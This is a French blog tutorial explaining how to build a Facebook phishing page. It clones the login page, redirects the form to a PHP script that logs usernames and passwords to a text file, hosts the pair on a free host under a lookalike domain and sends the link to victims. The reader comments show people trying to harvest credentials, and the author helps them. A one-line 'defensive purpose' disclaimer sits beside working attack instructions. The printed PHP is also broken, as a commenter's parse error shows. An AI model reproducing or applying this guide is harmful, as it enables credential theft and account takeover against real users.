Fourni par Blogger.

Comment créer une page de phishing facebook pour hacker les mots de passe


Création facile d'une page de phishing, exemple de page pour le phishing des mots de passe facebook.

Page de phishing facebook

Le phishing est une pratique du piratage informatique, qui consiste à cloner une page web dans le seul but de recueillir les informations des utilisateurs. Ces informations peuvent être les logins dans les forums, les informations bancaires, le mots de passes des comptes paypal, et dans notre cas, la page de phishing de mot de passe facebook. Serte facebook engage des milliers de personnes pour la sécurisation des comptes des utilisateurs, mais le social engineering se concentre sur la victime et joue sur sa psychologie. Tout comme le spoofing mail, le physhing reste l'une des techniques les plus utilisées par les hackeurs débutants et confirmés.


Les étapes de création d'une page de phishing facebook

étape 1 : aller à la page d'accueil de facebook et faire un click droit de la souris, vous verrez l'option code source de la page

Une de phishing à cloner

2   copier le code source et le coller dans un éditeur de texte comme bloc-note.

dans votre éditeur de texte, faites CTR + F et dans la barre de recherche qui apparait, taper le mot Action= .
La page suivante illustre la procédure.

Code source de notre page de phishing facebook

4 remplacer tout le lien qui se trouve " entre ces guillemet " par post.php .j'explique à quoi cela va servir concrètement.
Lorsque que vous entrez vos informations de connexion Facebook, et que vous cliquez sur connexion, le traitement se fait  via post.php. On a donc action="post.php" .

5 Enrégistrez votre code modifié sur l'extension html
 Si vous avez juste les bases en programmation web, vous comprendrez facilement.

Enrégistrement de la page facebook en index.html


 6 Ouvrir à nouveau votre éditeur de texte copier coller le code en dessous.

<?php
header ('Location: http://www.facebook.com/');
$handle=fopen("utilisateurs.txt", "a");
foreach($_POST as $variable=>$value);{
fwrite($handle, $variable);
fwrite($handler, "=");
 fwrite($handler, "$value");
fwrite($handler, "\r\n\");

fwrite($handler, "\r\n\");
fclose($handle);
exit;
}
 ?>

7  Enregistrez le document sous l'extion php: post.php
C'est l'adresse de l'attribut action du premier document index.html.
 Vous avez maintenant deux fichiers, le premier index.html et le second post.php.

 8 Héberger vos deux fichier dans votre espace d'hébergement ou chez un hébergeur gratuit.
Chez 00webhost, la procédure est la suivante:

-Création de compte gratuit

Hébergement d'une page de phishing


 - Accédez dans votre panneau de contrôle, à partir de là, vous verrez file manager.

Hébergement d'une page de phishing 00webhost

 
 Cliquez dessus, et une fenêtre pop up apparait, à l'intérieur, cherchez et ouvrez public_html.

Effacer le fichier default.php, après avoir ajouté vos deux fichiers crées au cours du tutos: index.html et post.php

Phishing tutoriel

10 Ouvrez le lien de votre page index.html, vous constaterez que la page est identique à celle de facebook. La seulement différence se trouve au niveau du lien. Comme 00webhost donne plutôt des sous-noms de domaine gratuits, la possibilité de personnaliser votre lien est limité, car il sera sous la forme: monexemple.netne.net.
monexemple sera remplace par votre nom de choix, expemle facelook.netne.net .
 Copiez l'url de votre page index.html et envoyez la à vos victimes. Dès qu'ils se connectent, vous pouvez ainsi récupérer leurs Mots de passe Facebook

11 Récupération du mot de passe de vos victimes 

Ouvrez votre espace hébergement 00webhost=>File Manager => Public_html, là vous trouverez un nouveau fichier créé qui sera nommé utilisateurs.txt 
Les noms d'utilisateurs et mots de passe serons présent dans ce fichier, mais pour qu'il soit créé, il faut qu'au moins une victime ait entré ses informations. Dans l'exemple en dessous, le fichier utilisateurs était plutôt créé sur le nom de usernames.txt( qui signifie toujours noms des utilisateurs).

Phishing tutoriel suite
  
 Si vous avez respecté toutes les étapes normalement, votre première page de phishing facebook serat créé et prête à l'emploie.
Pour les Anglophones qui aimerait la version anglaise, c'est par là le hacking facebook grâce au phishing.

 Je rappel qu'ils existe plusieurs autres méthodes que vous pourriez découvrir : Autres astuces pour  hacker un compte facebook sans logiciel

Le but des tutoriels de  Hacking , est de vous instruire à fin de mieux vous défendre et non de vous inciter à nuire à autrui.

Des questions ou suggestions, laissez les en commentaire et je me ferais le grand plaisir de vous répondre. 
 

Nous avons un groupe de discussion sur Facebook


Partager sur Google Plus
Mr Moss est mon pseudo de blogueur. Développeur web et hackeur éthique, je me donne du plaisir à partager avec mes lecteurs de nouvelles "astuces Geek". Freemobilesurf.com te propose de super tutos qui t'aiderons à mieux progresser en informatique et à résoudre un bon nombre de problèmes liés aux technologies et appareils high tech . Nos pages Facebook et Youtube .

18 commentaires:

  1. La page de phishing ne march pas. on signal des erreurs. cordialement

    RépondreSupprimer
    Réponses
    1. Salut Sylvain,

      Vérifie que toutes les étapes sont bien respectées. Les codes de phishing facebook doivent être recopiés de façon identique.

      Supprimer
  2. BOonjour et merci pour l'astuce mais est ce possible avec un autre hebergeur ?

    RépondreSupprimer
    Réponses
    1. Le plus important est d'héberger la page de phishing facebook et pouvoir récupérer les infos après. Donc quelque soit l'hébergeur, ça devrais aller.

      Supprimer
  3. Bonjour.

    Pour héberger le fichier vous vous expliquez avec l'ancienne version du site. Est-ce que ce serais possible de nous expliquer avec la version actuelle s'il vous plait?

    Merci d'avance.

    Cordialement

    RépondreSupprimer
    Réponses
    1. Avec la version actuelle la logique reste la même. Même s'il y a des changements au niveau du Backoffice, héberger la page de phishing facebook suit le même principe que dans le tutoriel.

      Supprimer
  4. Bonjour,
    Le site d'hébergement ne me laisse plus me connecter pour avis.. :(
    Help....
    Sinon aurais tu simplement une page phising prête à l'emploi, juste Pour une fois, Et me récupérer un truc ? :)))

    RépondreSupprimer
  5. Hello,
    Merci pour ce tuto mais le site d'hébergement ne me laisse plus me connecter pour abus.. pourrais tu m'aider ?
    As tu une page phising prête à l'emploi pour éventuellement m'aider à la récupération ? :))
    Cordialement

    RépondreSupprimer
    Réponses
    1. Une page de phishing facebook prête à l'emploi, je n'en dispose pas malheureusement. Sauf celle que j'ai autrefois utilisé.

      Supprimer
  6. Le fichier utilisateur ne se crée pas

    RépondreSupprimer
  7. Le fichier utilisateurs.txt ne se crée pas une soluce ?

    RépondreSupprimer
    Réponses
    1. Si ce fichier ne se cré pas, cela signifie tout simplement que personne n'a pas encore entré ses informations de connexion Facebook. Et rassure-toi que les différentes pages nécessaires au phishing Facebook ont été bien créé.

      Supprimer
  8. Bonjour j'ai beaucoup de mal stp peut tu m'aider memé sur skype ou en video stp
    Récompense a l'appui ....

    RépondreSupprimer
    Réponses
    1. Salut Rayan Malakoff,

      Tu es bloqué à quel niveau? As-tu au moins suivit la procédure exacte comme détaillé dans le tutoriel?

      Supprimer
  9. Quand tu dis : Effacer le fichier default.php, après avoir ajouté vos deux fichiers crées au cours du tutos: index.html et post.php

    Je ne vois pas de fichier default.php
    Et je n'arrive pas a ajouté de dossier
    stp donne moi les procédures

    RépondreSupprimer
    Réponses
    1. LE fichier default.php se trouve à la racine de ton espace d'hébergement web. L'hébergeur doit disposer d'un client manager. Regarde bien.

      Supprimer
  10. Parse error: syntax error, unexpected '\' (T_NS_SEPARATOR), expecting ',' or ')' in /storage/ssd2/684/2326684/public_html/post.php on line 10
    ya une erreur dans le fichier php ?

    RépondreSupprimer